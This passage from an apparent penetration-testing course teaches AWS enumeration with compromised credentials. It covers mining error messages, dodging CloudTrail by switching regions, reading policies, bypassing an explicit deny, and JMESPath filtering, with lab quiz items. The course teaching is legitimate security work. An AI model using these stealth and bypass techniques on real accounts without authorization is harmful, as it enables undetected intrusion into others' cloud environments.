In general, we can execute a function with aws lambda invoke --function-name <function_name_or_arn> <outfile>, in which --function-name specifies the name of the function and outfile is the name of the output file. Let's craft an ARN for a nonexistent lambda function.
kali@kali:~$ aws --profile target lambda invoke --function-name arn:aws:lambda:us-east-1:123456789012:function:nonexistent-function outfile
An error occurred (AccessDeniedException) when calling the Invoke operation: User: arn:aws:iam::123456789012:user/support/clouddesk-plove is not authorized to perform: lambda:InvokeFunction on resource: arn:aws:lambda:us-east-1:123456789012:function:nonexistent-function because no resource-based policy allows the lambda:InvokeFunction action
Listing 50 - Getting information from error messages
We encountered an authentication error, which was anticipated since we are attempting to interact with a nonexistent resource. However, the error message offers us valuable information, including the account ID, the type of identity (IAM user or role), and the name of the identity executing this operation.
We obtained the same information from running sts get-caller-identity, and even though the command generated an error, it should not have generated a log event which could potentially alert an administrator.
There isn't a "list" of actions that aren't logged in the Cloudtrail event history. However, Cloudtrail's Documentation states that data events and insights events are not displayed. Since invoking a Lambda function is considered a data event, it is not displayed in the event history. It's important to note that while these events might not be logged by default in the event history, they can indeed be captured (if configured) using trails.
One final consideration is that attackers may attempt to discern which AWS regions the account operates in and execute these commands in a different region. This increases the likelihood of evading detection.
Warning
AWS let us locate our resources in one or more regions spread throughout the world. By default, many regions are enabled in the account even if we're only using one or two.
Let's take on the role of an administrator for a moment to validate that this technique works. We'll log in to the Management Console using the monitoring user credentials we received when we started the lab. Then we'll navigate to the CloudTrail service page. We can find this page in the Services Menu or through the Search Box.
Tip
When we first open the CloudTrail Service page, an AccessDenied error will appear at the top of the page stating "The option to create an organization trail is not available for this AWS account". We can safely ignore this error as it doesn't affect what we'll do with this user.
On the Cloudtrail page, we'll click on the Event History option from the menu located on the left side of the page. If the Cloudtrail menu doesn't appear, we can open it by clicking the hamburger icon located on the top left-hand side.
Next, as the attacker, we'll use the compromised credentials to check if these events are recorded in the Cloudtrail page.
Let's execute sts get-caller-identity once more, but this time we'll specify a different region with --region us-east-2.
kali@kali:~$ aws --profile target sts get-caller-identity --region us-east-2
{
"UserId": "AIDAQOMAIGYUYVDBXFNVF",
"Account": "123456789012",
"Arn": "arn:aws:iam::123456789012:user/support/clouddesk-plove"
}
Listing 51 - Executing an API request to another region.
Within a few minutes, a log entry from the us-east-2 region appears in the Cloudtrail event history. However, there is no entry from us-east-1. We may need to adjust the filter parameters to query the logs for Event Name and the GetCallerIdentity value. We can also use the quick access links below which already contain the region and the filter we desire.
Quick access link to Cloudtrail Page in Region us-east-1 filtering by Event Name.
Quick access link to Cloudtrail Page in Region us-east-2 filtering by Event Name.
The following animated figure shows this process of comparing the logs in Cloudtrail swapping between two different regions. The log entry of the of the GetCallerIdentity event is not visible in the default region us-east-1, but appears when we switch to the us-east-2 region.
One way to avoid this is to specify which AWS regions your account can use and monitor all activity in these regions.
In this initial stage, regardless of the cloud service provider we are assessing, it's essential to identify and use services and actions that provide valuable information about the compromised user's cloud environment. If maintaining stealth is important, we should first focus on activities that aren't recorded by default to discreetly gather information about the compromised target.
Labs
- In AWS CLI, what sts subcommand returns details about the IAM user or role whose credentials are used to call the operation? (Write only the name of the subcommand)
- In AWS CLI, what sts subcommand returns the account identifier for the specified access key ID? (Write only the name of the subcommand)
- In AWS CLI, what is the name of the option flag that specifies the region to use overlapping the default region? (Write your answer in this format: --name)
24.4.3. Scoping IAM permissions
All cloud providers implement some kind of authentication and authorization mechanisms to ensure that users can only interact with the provider's API within their designated permissions and cannot act on behalf of other users or accounts. All these mechanisms are commonly grouped under the umbrella term Identity and Access Management (IAM).
The Principle of Least Privilege (PoLP) is generally followed as a best practice for any cloud deployment. This principle suggests granting users only the permissions they need to perform their tasks, and nothing more. This will reduce actions that can be performed and limit potential attack vectors that an attacker can exploit from a compromised account. However, overly-permissive identities are still a common finding and the major cause of breaches in cloud environments.
Continuing in the lab, we'll again take on the role of an attacker to determine the extent of permissions associated with the compromised credentials in the target environment.
We've already uncovered some valuable information from the previous get-caller-identity subcommand which revealed that the compromised identity is an IAM User with a username of clouddesk-plove. We also identified the support path:
kali@kali:~$ aws --profile target sts get-caller-identity
{
"UserId": "AIDAQOMAIGYUYNMOIF46I",
"Account": "123456789012",
"Arn": "arn:aws:iam::123456789012:user/support/clouddesk-plove"
}
Listing 52 - Running the get-caller-identity command
This suggests the purpose of the user and what permissions they likely have. For example, "clouddesk" and "support" may tell us that the user has some IAM-related privileges to grant access or reset credentials. This type of hypothesis is helpful as it's extra information we've gained while maintaining a low profile.
We could also take a more direct approach. Let's try to list the policies associated with the compromised identity by interacting directly with the provider API. An identity is an IAM resource that can be authorized to perform actions and access resources. Identities include users, groups, and roles. Within AWS IAM, there are two primary ways policies can be associated to an Identity. Inline Policies are directly linked to a single identity and exist only in that identity space. Managed Policies stand as distinct, reusable policies that can be associated with multiple identities.
An identity can also inherit policies from other identities. For example, an IAM user that is a member of a User Group will inherit that group's policies.
We can list inline policies and managed policies associated with the user by running list-user-policies and list-attached-user-policies respectively. Both commands will require the --user-name flag to specify the target user.
kali@kali:~$ aws --profile target iam list-user-policies --user-name clouddesk-plove
{
"PolicyNames": []
}
kali@kali:~$ aws --profile target iam list-attached-user-policies --user-name clouddesk-plove
{
{
"AttachedPolicies": [
{
"PolicyName": "deny_challenges_access",
"PolicyArn": "arn:aws:iam::123456789012:policy/deny_challenges_access"
}
]
}
}
Listing 53 - Listing inline and managed policies associated with an IAM user
Since we did not receive an error message, we know that the IAM user has permission to run the iam:ListAttachedUserPolicies action. However, we still have not discovered any useful policies associated with the IAM user. The deny_challenges_access policy is related to a later challenge. We'll ignore it for now.
Let's try to run more IAM commands and prioritize retrieving the policy for this user.
First, we'll try to determine if the IAM user inherits any policies from assigned groups. To do this, we'll need to determine if the user is a member of any groups with the list-groups-for-user subcommand specifying the name of the user with --user-name clouddesk-plove.
kali@kali:~$ aws --profile target iam list-groups-for-user --user-name clouddesk-plove
{
"Groups": [
{
"Path": "/support/",
"GroupName": "support",
"GroupId": "AGPAQOMAIGYUSHSVDSYIP",
"Arn": "arn:aws:iam::123456789012:group/support/support",
}
]
}
Listing 54 - Listing the groups to which the user belongs.
We discovered that the IAM user belongs to only one group, named support.
Next, we'll check for policies associated with the support group. We'll search for inline and managed policies in a search similar to one we ran previously. Let's use list-group-policies to list inline policies linked to the group and list-attached-group-policies to list managed policies attached to the group. We'll specify the group name for both commands with --group-name.
kali@kali:~$ aws --profile target iam list-group-policies --group-name support
{
"PolicyNames": []
}
kali@kali:~$ aws --profile target iam list-attached-group-policies --group-name support
{
"AttachedPolicies": [
{
"PolicyName": "SupportUser",
"PolicyArn": "arn:aws:iam::aws:policy/job-function/SupportUser"
}
]
}
Listing 55 - Listing inline and managed policies associated with an IAM group
From the output, we learn that the group doesn't have any inline policy, but it does have an attached managed policy. This particular policy is classified as an AWS Managed Policy, a special set of policies provided by AWS with pre-defined permissions to quickly attach to IAM Identities. However, a word of caution: these policies often grant broader permissions than might be desired. Ideally, they should be paired with other more-restrictive policies to ensure fine-grained permission control.
Warning
While AWS Managed Policies offer flexibility for IAM management, they tend to be overly-permissive and there is an inherent security risk when they are used alone.
We discovered this user possesses SupportUser, which is a special type of AWS managed policy that is based on Job Functions. We can identify this from the keyword job-function in the policy's ARN highlighted in the Listing above.
We'll note the ARN string, as we'll need it in a moment.
The documentation suggests that the SupportUser policy permits many read-only actions for several AWS services. Let's validate this in the lab.
First, we'll need to determine the current version of the policy since policies support versioning. We'll use aws iam list-policy-versions for this and specify the policy by its ARN with --policy-arn.
kali@kali:~$ aws --profile target iam list-policy-versions --policy-arn "arn:aws:iam::aws:policy/job-function/SupportUser"
{
"Versions": [
{
"VersionId": "v8",
"IsDefaultVersion": true
},
{
"VersionId": "v7",
"IsDefaultVersion": false,
},
...
Listing 56 - Listing a policy version
We'll take note of the most recent version ID, v8.
We can now retrieve the policy document with aws iam get-policy-version. Again, we'll specify the ARN of the policy and we'll also specify the version Id (v8) with --version-id.
kali@kali:~$ aws --profile target iam get-policy-version --policy-arn arn:aws:iam::aws:policy/job-function/SupportUser --version-id v8
{
"PolicyVersion": {
"Document": {
"Version": "2012-10-17",
"Statement": [
{
"Action": [
"support:*",
"acm:DescribeCertificate",
"acm:GetCertificate",
"acm:List*",
"acm-pca:DescribeCertificateAuthority",
"autoscaling:Describe*",
...
"workdocs:Describe*",
"workmail:Describe*",
"workmail:Get*",
"workspaces:Describe*"
],
"Effect": "Allow",
"Resource": "*"
}
]
},
"VersionId": "v8",
"IsDefaultVersion": true,
...
}
}
Listing 57 - Listing a policy definition by its version
In summary, the policy defines a list of Actions for many AWS services. Some of these elements define a specific action. For example, acm:DescribeCertificate defines the DescribeCertificate action for the AWS Certificate Manager service. Other elements use the "*" wildcard to describe any action that starts with read-only keywords such as Get, Describe and, List. These actions are allowed to run against any resource of the given services as stated in the "Resource": "*" line.
At this point, we do not have the ability to create or modify new cloud resources, we do have permission to read information about several resources.
Finally, let's suppose that our compromised credentials don't have the privileges to query for IAM-related information. In this case, we need to adopt a brute-force approach, meaning we'll run several actions on services in hopes of finding one that doesn't produce an authorization error.
We can build a script to automate this brute-force approach or leverage popular AWS tools such as pacu (Module: iam__bruteforce_permissions), awsenum or enumerate-iam. We can use any of these approaches to discover permissions in compromised credentials.
Just like many brute-force attacks, these tools will generate a lot of ActionDenied account events that could trigger alarms within the target. This may not be a problem in some pentesting assessments which do not require stealth. In red-teaming assessments which prioritize stealth, we could adopt a manual approach, which will generate fewer errors and sound less alarms. We should always leverage information from our reconnaissance to help with this. For example, if we determined a list of services the account is using, we can target those services first, reducing the amount of noise we generate.
In this stage, we used the CSP APIs to attempt to scope the level of access that we obtained from the compromised credentials. With access to IAM-related actions, we learned that we can query directly for this information. Otherwise, depending on the assessment, we can try to enumerate the privileges by running an automated or manual approach to scope the level of access.
Labs
- What command is used to list the inline policies associated with an IAM user in AWS?
A) list-attached-user-policies
B) list-user-policies
C) list-group-policies
D) list-policies
- What does the wildcard "*" represent in an IAM policy's action statement?
A) It limits the action to a specific resource
B) It grants read-only permissions
C) It allows all actions that match the specified prefix
D) It denies all actions for the specified service
- Use the challenge Profile in AWS CLI to scope the level of actions allowed to run in the EC2 service. Run the permitted actions to list or describe Resources. You will find a Tag Key named proof in one of the resources you can list. Enter the value of the Tag Key.
24.5. IAM Resources Enumeration
This Learning Unit covers the following Learning Objectives:
- Choosing Between a Manual or Automated Enumeration Approach
- Enumerating IAM Resources
- Processing API Response data with JMESPath
- Running Automated Enumeration with Pacu
- Extracting Insights from Enumeration Data
In the previous Learning Unit, we set the stage of this scenario from the perspective of an attacker that compromised a target and obtained credentials to interact with the provider's API. We then conducted footprinting of the compromised environment, tried to identify which accounts or access keys we had access to, and determined our level of access within the compromised environment. By combining our findings with information gathered from external probing, we established a foundational understanding of some services that the account had access to.
Next, we'll gather more data from the target. There's no one-size-fits-all approach to this task. The data we're hoping to obtain will vary based on many factors and the techniques we'll use depend on the target's cloud environment and providers.
In the following sections, we will enumerate more IAM resources within an AWS environment but many of the tactics and procedures apply to other cloud service providers as well.
24.5.1. Choosing Between a Manual or Automated Enumeration Approach
Several commercial and open-source tools have been developed to perform information gathering against cloud-based infrastructures. Some of these tools are tailored towards specific cloud providers, while others support multiple providers. Some are GUI-based and some run from the command line. Some are automated and some require manual intervention.
Most tools generate significant log events and may trigger monitoring systems. This may not be a significant consideration when performing a red team assessment or a penetration test in which stealth is not a requirement, but when stealth is a factor, we must test our tools to determine the potential impact prior to an engagement.
Given the variety of available tools, varied assessment goals, user preference, budget requirements and other factors, there is rarely ever a "best tool" for the job. Generally speaking, we should train with multiple tools so that we understand their capabilities and limitations and can rely on them in any given situation, in the best possible combination as needed. It is important, however, that we always understand the technologies in use with any tool we rely on so that we don't develop a bad habit of simply running multiple tools for any given situation which can be dangerous and inefficient.
24.5.2. Enumerating IAM Resources
As we begin to enumerate IAM resources, we'll start our scenario in possession of an already-compromised account. Let's summarize what we have already learned from the compromised credentials.
Resource Type | Name | ARN |
---|---|---|
IAM::User | clouddesk-plove | arn:aws:iam::123456789012:user/support/clouddesk-plove |
IAM:Group | support | arn:aws:iam::123456789012:group/support/support |
IAM::Policy | SupportUser | arn:aws:iam::aws:policy/job-function/SupportUser |
The compromised credentials we possess belong to the clouddesk-plove IAM user, which is a member of the support group and inherits the policy attached to the group. The policy is an AWS custom-managed policy based on the Support Users job function.
Warning
AWS custom-managed policies allow users to define a set of permissions that can be reused and associated with multiple IAM users, groups, or roles. While these policies offer flexibility for IAM management, there is an inherent security risk if they are crafted to be overly permissive.
SupportUser is an AWS custom-managed policy that grants permissions to troubleshoot and resolve issues in an AWS account. This policy grants read-only access to explore several services.
Let's check what actions this policy grants to enumerate IAM resources. To do this we'll run iam get-policy-version to show the policy definition. We'll pipe the output to grep to filter and display only the lines that contain the string iam.
kali@kali:~$ aws --profile target iam get-policy-version --policy-arn arn:aws:iam::aws:policy/job-function/SupportUser --version-id v8 | grep "iam"
"iam:GenerateCredentialReport",
"iam:GenerateServiceLastAccessedDetails",
"iam:Get*",
"iam:List*",
Listing 58 - Getting the permissions related to IAM service of the SupportUser policy
With this policy, we can run any iam subcommand that starts with get and list and two other specific actions. To list the available subcommands in AWS CLI we can use the help option.
Let's run aws iam help to display a description of the command usage including a list of all available subcommands. We'll also add | grep -E "list-|get-|generate-" to filter all the lines that include the words "list-", "get-" and "generate-".
kali@kali:~$ aws --profile target iam help | grep -E "list-|get-|generate-"
o generate-credential-report
o generate-organizations-access-report
o generate-service-last-accessed-details
o get-access-key-last-used
o get-account-authorization-details
o get-account-password-policy
o get-account-summary
o get-context-keys-for-custom-policy
o get-context-keys-for-principal-policy
o get-credential-report
o get-group
o get-group-policy
o get-instance-profile
o get-login-profile
o get-open-id-connect-provider
o get-organizations-access-report
o get-policy
o get-policy-version
o get-role
o get-role-policy
o get-saml-provider
o get-server-certificate
o get-service-last-accessed-details
o get-service-last-accessed-details-with-entities
o get-service-linked-role-deletion-status
o get-ssh-public-key
o get-user
o get-user-policy
o list-access-keys
o list-account-aliases
o list-attached-group-policies
o list-attached-role-policies
o list-attached-user-policies
o list-entities-for-policy
o list-group-policies
o list-groups
o list-groups-for-user
o list-instance-profile-tags
o list-instance-profiles
o list-instance-profiles-for-role
o list-mfa-device-tags
o list-mfa-devices
o list-open-id-connect-provider-tags
o list-open-id-connect-providers
o list-policies
o list-policies-granting-service-access
o list-policy-tags
o list-policy-versions
o list-role-policies
o list-role-tags
o list-roles
o list-saml-provider-tags
o list-saml-providers
o list-server-certificate-tags
o list-server-certificates
o list-service-specific-credentials
o list-signing-certificates
o list-ssh-public-keys
o list-user-policies
o list-user-tags
o list-users
o list-virtual-mfa-devices
Listing 59 - Getting available IAM subcommands
IAM is a critical component of AWS that manages all actions related to the authentication and authorization of identities. Having this level of access, even though it's read-only access, is a big deal.
We won't cover the entire list of subcommands in this lab. We could, however, learn about any of them by running aws iam command help. This will show details about the subcommand and its basic usage including the required and optional parameters.
Let's start by getting a summary of the IAM-related information in the account. We'll run aws iam get-account-summary with no additional arguments.
To limit our noise level, we'll redirect the output to a standard file. This way, we can review the output later without interacting with the AWS API again. We'll use tee to display the output to the console while also redirecting the content to a file.
kali@kali:~$ aws --profile target iam get-account-summary | tee account-summary.json
aws --profile target iam get-account-summary
{
"SummaryMap": {
"GroupPolicySizeQuota": 5120,
"InstanceProfilesQuota": 1000,
"Policies": 8,
"GroupsPerUserQuota": 10,
"InstanceProfiles": 0,
"AttachedPoliciesPerUserQuota": 10,
"Users": 18,
"PoliciesQuota": 1500,
"Providers": 1,
"AccountMFAEnabled": 0,
"AccessKeysPerUserQuota": 2,
"AssumeRolePolicySizeQuota": 2048,
"PolicyVersionsInUseQuota": 10000,
"GlobalEndpointTokenVersion": 1,
"VersionsPerPolicyQuota": 5,
"AttachedPoliciesPerGroupQuota": 10,
"PolicySizeQuota": 6144,
"Groups": 8,
"AccountSigningCertificatesPresent": 0,
"UsersQuota": 5000,
"ServerCertificatesQuota": 20,
"MFADevices": 0,
"UserPolicySizeQuota": 2048,
"PolicyVersionsInUse": 27,
"ServerCertificates": 0,
"Roles": 20,
"RolesQuota": 1000,
"SigningCertificatesPerUserQuota": 2,
"MFADevicesInUse": 0,
"RolePolicySizeQuota": 10240,
"AttachedPoliciesPerRoleQuota": 10,
"AccountAccessKeysPresent": 0,
"GroupsQuota": 300
}
}
Listing 60 - Getting the IAM Account Summary
The output shows some information that is more relevant for administrators such as resource quotas, but it also shows some insights about the number of IAM resources created in the account such as Users, Roles, Groups, and Policies.
This data also highlights some poor practices in the configuration that could lead to further exploitation. Notably, "MFADevices": 0 and "MFADevicesInUse": 0, indicate that none of the eighteen IAM users use Multi-Factor Authentication (MFA). This lack of a secondary authentication layer makes the account more vulnerable if its credentials are compromised. In addition, "AccountMFAEnabled": 0 reveals that MFA is not enabled for the account's most critical user: root.
It is important to mention additional elements, although they fall outside the scope of this module. InstanceProfiles are essential for authorizing EC2 instances. They manage permissions and roles for instances in a secure manner. Providers refers to Identity Providers which are crucial for managing identities outside of AWS. They enable external identities to access AWS resources in the account. Lastly, ServerCertificates are necessary for services that require SSL/TLS encryption.
Let's continue enumerating all the IAM identities (users, user groups, and roles) in the account. We'll use the list-users, list-groups, and list-roles subcommands respectively.
kali@kali:~$ aws --profile target iam list-users | tee users.json
{
"Users": [
{
"Path": "/admin/",
"UserName": "admin-alice",
"UserId": "AIDAQOMAIGYU3FWX3JOFP",
"Arn": "arn:aws:iam::123456789012:user/admin/admin-alice",
},
...
kali@kali:~$ aws --profile target iam list-groups | tee groups.json
{
"Groups": [
{
"Path": "/admin/",
"GroupName": "admin",
"GroupId": "AGPAQOMAIGYUXBR7QGLLN",
"Arn": "arn:aws:iam::123456789012:group/admin/admin",
},
...
kali@kali:~$ aws --profile target iam list-roles | tee roles.json
{
"Roles": [
{
"Path": "/",
"RoleName": "aws-controltower-AdministratorExecutionRole",
"RoleId": "AROAQOMAIGYU6PUFJYD7W",
"Arn": "arn:aws:iam::123456789012:role/aws-controltower-AdministratorExecutionRole",
...
Listing 61 - Listing IAM identities
The three commands will output an array of all the users, groups, and roles in the account, providing detailed information about each identity, including its name, ARN, and path. These attributes can help us identify valuable identities for further analysis. For instance, we may find some identities with the "admin" keyword in both their names and paths. While these require further verification, they could be particularly significant for exploitation.
Up to this point, we have saved the data into their respective files so we can later parse these files to extract valuable insights from the account. Before we dig through this data, let's continue to gather more information.
We can list all managed policies with list-policies. We'll use --scope Local to display only the Customer Managed Policies and omit the AWS Managed Policies, and we'll use --only-attached to list only the policies that are attached to an IAM identity.
kali@kali:~$ aws --profile target iam list-policies --scope Local --only-attached | tee policies.json
{
"Policies": [
{
"PolicyName": "manage-credentials",
"PolicyId": "ANPAQOMAIGYU3LK3BHLGL",
"Arn": "arn:aws:iam::123456789012:policy/manage-credentials",
"Path": "/",
"DefaultVersionId": "v1",
"AttachmentCount": 1,
"PermissionsBoundaryUsageCount": 0,
"IsAttachable": true,
"UpdateDate": "2023-10-19T15:45:59+00:00"
},
...
Listing 62 - Listing policies.
Next, to get the inline policies for every identity associated with the compromised credentials, we could run the following subcommands:
- list-user-policies
- get-user-policy
- list-group-policies
- get-group-policy
- list-role-policies
- get-role-policy
Similarly, we can check for all managed policies with the following subcommands:
- list-attached-user-policies
- list-attached-group-policies
- list-attached-role-policies
After that, we'll need to run the get-policy-version subcommand to read the policy document for each of the managed policies we found.
Notice that this manual information gathering approach can be quite tedious. Automated tools would excel at processing all of this information and presenting it in a summarized format.
We could also adopt a simpler approach by running the iam get-account-authorization-details subcommand. This retrieves information about all IAM users, groups, roles, and policies in an AWS account, including their relationships with one another.
Tip
In order to execute get-account-authorization-details, the account running the command must have the GetAccountAuthorizationDetails permission attached to its policy. While it's not common to find this permission exclusively on a policy, it is included when a wildcard is used for all get permissions (iam:Get*) which is common.
We can filter the results using the --filter and a list of space-separated elements which may include User, Role, Group, LocalManagedPolicy, and AWSManagedPolicy. We are not interested in AWS custom-managed policies so we'll omit this value.
kali@kali:~$ aws --profile target iam get-account-authorization-details --filter User Group LocalManagedPolicy Role | tee account-authorization-details.json
{
"UserDetailList": [
{
"Path": "/admin/",
"UserName": "admin-alice",
"UserId": "AIDAQOMAIGYU3FWX3JOFP",
"Arn": "arn:aws:iam::123456789012:user/admin/admin-alice",
"GroupList": [
"amethyst_admin",
"admin"
],
...
"GroupDetailList": [
{
"Path": "/admin/",
"GroupName": "admin",
"GroupId": "AGPAQOMAIGYUXBR7QGLLN",
"Arn": "arn:aws:iam::123456789012:group/admin/admin",
"GroupPolicyList": [],
...
"RoleDetailList": [
{
"Path": "/",
"RoleName": "aws-controltower-AdministratorExecutionRole",
"RoleId": "AROAQOMAIGYU6PUFJYD7W",
"Arn": "arn:aws:iam::123456789012:role/aws-controltower-AdministratorExecutionRole",
...
"Policies": [
{
"PolicyName": "ruby_admin",
"PolicyId": "ANPAQOMAIGYU3I3WDCID3",
"Arn": "arn:aws:iam::123456789012:policy/ruby/ruby_admin",
"Path": "/ruby/",
...
Listing 63 - Retrieving a snapshot of the IAM configuration with the get-account-authorization-details subcommand
This command returned a great deal of information about the identities and policies in the account. Notably, it's the same information previously gathered, but obtained through a single request, meaning we have generated fewer events in the events history logs. When we build our own tools to query this information, we should start with this command, given its lower profile.
Next, let's check something curious about the the authorization details we discovered.
The clouddesk-plove IAM user is associated with a policy that denies access to certain resources. We observed this while scoping the IAM permissions of the compromised user, but we disregarded it at that time. Let's rerun that command and review the list of managed policies associated with this user.
kali@kali:~$ aws --profile target iam list-attached-user-policies --user-name clouddesk-plove
{
"AttachedPolicies": [
{
"PolicyName": "deny_challenges_access",
"PolicyArn": "arn:aws:iam::12345678912:policy/deny_challenges_access"
}
]
}
Listing 64 - Listing the managed policies of the clouddesk-plove IAM user
We identified one managed policy (named deny_challenges_access) associated with the user. To understand the policy's function, we need to read its policy document. Let's take the ARN of this policy and attempt to list its policy versions to gain further insights.
kali@kali:~$ aws --profile target iam list-policy-versions --policy-arn arn:aws:iam::12345678912:policy/deny_challenges_access
An error occurred (AccessDenied) when calling the ListPolicyVersions operation: User: arn:aws:iam::12345678912:user/support/clouddesk-plove is not authorized to perform: iam:ListPolicyVersions on resource: policy arn:aws:iam::12345678912:policy/deny_challenges_access with an explicit deny in an identity-based policy
Listing 65 - Getting an AccessDenied error when trying to list the policy versions of the deny_challenges_access policy
The error message, indicating that the operation is "explicitly denied" suggests that the administrator restricted this user's access to certain resources.
This is about to get very interesting. Let's run get-account-authorization-details --filter LocalManagedPolicy to retrieve all the custom managed policies of the account and browse the list until we find the details of the deny_challenges_access policy.
kali@kali:~$ aws --profile target iam get-account-authorization-details --filter LocalManagedPolicy
...
{
"PolicyName": "deny_challenges_access",
"PolicyId": "ANPATV2ULYL4RBGWQT5SE",
"Arn": "arn:aws:iam::253043131129:policy/deny_challenges_access",
"Path": "/",
"DefaultVersionId": "v1",
"AttachmentCount": 1,
"PermissionsBoundaryUsageCount": 0,
"IsAttachable": true,
"CreateDate": "2023-12-11T23:25:03+00:00",
"UpdateDate": "2023-12-11T23:25:03+00:00",
"PolicyVersionList": [
{
"Document": {
"Statement": [
{
"Action": "*",
"Condition": {
"StringEquals": {
"aws:ResourceTag/challenge": "true"
}
},
"Effect": "Deny",
"Resource": "*",
"Sid": "DenyAllIAMActionsOnChallengedResources"
}
],
"Version": "2012-10-17"
},
"VersionId": "v1",
"IsDefaultVersion": true,
"CreateDate": "2023-12-11T23:25:03+00:00"
}
]
}
]
}
Listing 66 - Getting the list of policy versions from the output of the get-account-authorization-details command
After checking the details and the PolicyVersionList attribute we realize that we obtained the previously-denied policy document of the deny_challenges_access policy. This policy denies all actions on all resources tagged with "challenge: true". This policy prevented this user from reading the content of that policy directly. However, we managed to view it through the output of another permitted action, effectively circumventing the intended protection.
This was an example of abusing permitted actions to obtain information that is supposed to be denied in the IAM policies. In this case, we bypassed the protection using an action from the same IAM service but the same can happen using actions from other services, for example, listing resources by reading logs in Cloudtrail. As defenders, it's important to understand all the actions authorized to the identities and the scope of resources they can access.
Labs
- Which IAM subcommand retrieves information about IAM entity usage and IAM quotas in the Amazon Web Services account? (Write only the subcommand)
- Which one of the following is not a valid value for the --filter flag of the IAM get-account-authorization-detail subcommand? User, Group, Credential, Role, AWSManagedPolicy, LocalManagedPolicy?
- What is the path and name of the group that the IAM user dev-ballen belongs to? (Format: /path/group_name. Example: /amethyst/admin_group)
24.5.3. Processing API Response data with JMESPath
As previously mentioned, we have been using the aws client which produces JSON output by default. In this section, we will process the JSON output with JMESPath to filter our results.
JMESPath is a query language for JSON. It is used to extract and transform elements from a JSON document. There's no need to learn all the language at once. We just need to know that we can use it to create more advanced queries to process the information we gather during the enumeration phase.
In this section, we'll learn some basic querying using JMESPath by running some examples against the output of the iam get-account-authorization-details subcommand.
First, let's use --filter User to show user-related data.
kali@kali:~$ aws --profile target iam get-account-authorization-details --filter User
{
"UserDetailList": [
{
"Path": "/admin/",
"UserName": "admin-alice",
"UserId": "AIDAQOMAIGYUSSOCFCREC",
"Arn": "arn:aws:iam::123456789012:user/admin/admin-alice",
"GroupList": [
"admin"
],
"AttachedManagedPolicies": [],
"Tags": []
},
{
"Path": "/amethyst/",
"UserName": "admin-cbarton",
"UserId": "AIDAQOMAIGYUTHT4D5YLG",
"Arn": "arn:aws:iam::123456789012:user/amethyst/admin-cbarton",
"GroupList": [
"amethyst_admin"
],
"AttachedManagedPolicies": [],
"Tags": []
},
...
Listing 67 - Running get-account-authorization-details subcommand to get all IAM users information
The output shows a JSON document with the UserDetailList element. This is an array of Users objects with some key-value pairs representing properties of the object. For example, the listing above shows the UserName key with its corresponding admin-alice value (both highlighted).
Now, let's query only for the UserName keys for all the objects. This is a perfect opportunity to use a "UserDetailList[].UserName" JMESPath expression. This will retrieve all the objects of the UserDetailList array and output the value of the UserName key. We'll use the --query argument to specify the JMESPath expression.
Tip
The AWS CLI tool allows us to --filter the displayed output. One key difference is that the --filter argument runs on the server side while the --query filtering runs on the client side using JMESPath expressions.
kali@kali:~$ aws --profile target iam get-account-authorization-details --filter User --query "UserDetailList[].UserName"
[
"admin-alice",
"admin-cbarton",
"admin-srogers",
"admin-tstark",
"clouddesk-bob",
...
Listing 68 - Querying the UserName key from the JSON document.
We obtained all the objects but filtered them to display only the value of the UserName key. However, we can select more than one key. Let's query for the UserName, Path, and GroupList keys.
There are two ways to accomplish this. We could use an array like [key1, key2, key3] or an object like {Identifier1: key1, Identifier2: key2, IdentifierN: keyN} where "Identifier" is just a name we choose to name the key. The Listing below shows both outputs.
We'll use the "UserDetailList[0]" expression to choose only the first object of the array.
kali@kali:~$ aws --profile target iam get-account-authorization-details --filter User --query "UserDetailList[0].[UserName,Path,GroupList]"
[
"admin-alice",
"/admin/",
[
"admin"
]
]
kali@kali:~$ aws --profile target iam get-account-authorization-details --filter User --query "UserDetailList[0].{Name: UserName,Path: Path,Groups: GroupList}"
{
"Name": "admin-alice",
"Path": "/admin/",
"Groups": [
"admin"
]
}
Listing 69 - Quering for more than one key values
Both expressions accomplish the same result, so choosing an approach is just a matter of preference.
In the previous example, we used the expression "UserDetailList[0]" to select only the first object of the array. We can correctly infer that [1] will select the second object and so on. However, we can use the powerful Filter Projections feature that allows us to build more-advanced queries.
For example, let's list all the IAM Users whose usernames contain the word admin. We would use the UserDetailList[?contains(UserName, 'admin')] expression. Let's run that now.
kali@kali:~$ aws --profile target iam get-account-authorization-details --filter User --query "UserDetailList[?contains(UserName, 'admin')].{Name: UserName}"
[
{
"Name": "admin-alice"
},
{
"Name": "admin-cbarton"
},
{
"Name": "admin-srogers"
},
...
Listing 70 - Filtering all IAM Users whose names contain admin
We received a filtered response with the name of several potentially high-privileged users.
As a final example, we'll build an expression that selects elements from different objects. In this case, let's gather all the names of the IAM Users and Groups which contain "/admin/" in their Path key.
If the two expressions are written separately the expressions would be UserDetailList[?Path=='/admin/'].UserName and GroupDetailList[?Path=='/admin/'].GroupName. Let's build a JSON object with the desired elements. The Listing below shows the JSON object. Notice that we must use the --filter User Group argument to also obtain the Group objects.
kali@kali:~$ aws --profile target iam get-account-authorization-details --filter User Group --query "{Users: UserDetailList[?Path=='/admin/'].UserName, Groups: GroupDetailList[?Path=='/admin/'].{Name: GroupName}}"
{
"Users": [
"admin-alice"
],
"Groups": [
{
"Name": "admin"
}
]
}
Listing 71 - Constructing more advanced queries.
This shows that we can build custom JSON objects by filtering any information we want from the original JSON response.
We can find more examples on this topic on the JMESPath Examples page and in the AWS CLI Filter Output documentation.
In a subsequent section, we'll extract some valuable insights from this environment.
As a final recommendation, we should always try to reduce the number of requests we send by saving all output to a local file and then using an external tool like jp to filter that output with JMESPath expressions.
In summary, the --query parameter is a great AWS CLI feature that leverages JMESPath expressions. Azure CLI also implements a similar feature with JMESPath expressions. Other CSPs like Google Cloud don't implement this directly but they support displaying output in JSON so we can use external tools to process the data.
Labs
- Which argument allows you to filter data on the server side when using AWS CLI?
A) --query
B) --filter
C) --output
D) --select
- What will the JMESPath expression "UserDetailList[].UserName" retrieve?
A) All keys in the UserDetailList
B) Only the first UserName in the UserDetailList
C) All UserName values from the UserDetailList array
D) All users whose username contains "admin"
- What JMESPath expression will filter and display all users that contain the word "admin" in the Username and the Path fields? (Write only the JMESPath expression starting with "?". Use the contains function for both conditions. Example: ?contains(Path,'admin') ... )
24.5.4. Running Automated Enumeration with Pacu
In this section, we'll explore some of Pacu's enumeration modules as a case study for automated AWS enumeration. The goal of automation is to not only streamline our work, but more importantly to help us better understand the process and even build our own tools and workflows.
Let's start by installing pacu (if it's not already installed). The package is in the Kali repositories so we can install it by running sudo apt install pacu in the terminal.
kali@kali:~$ sudo apt update
kali@kali:~$ sudo apt install pacu
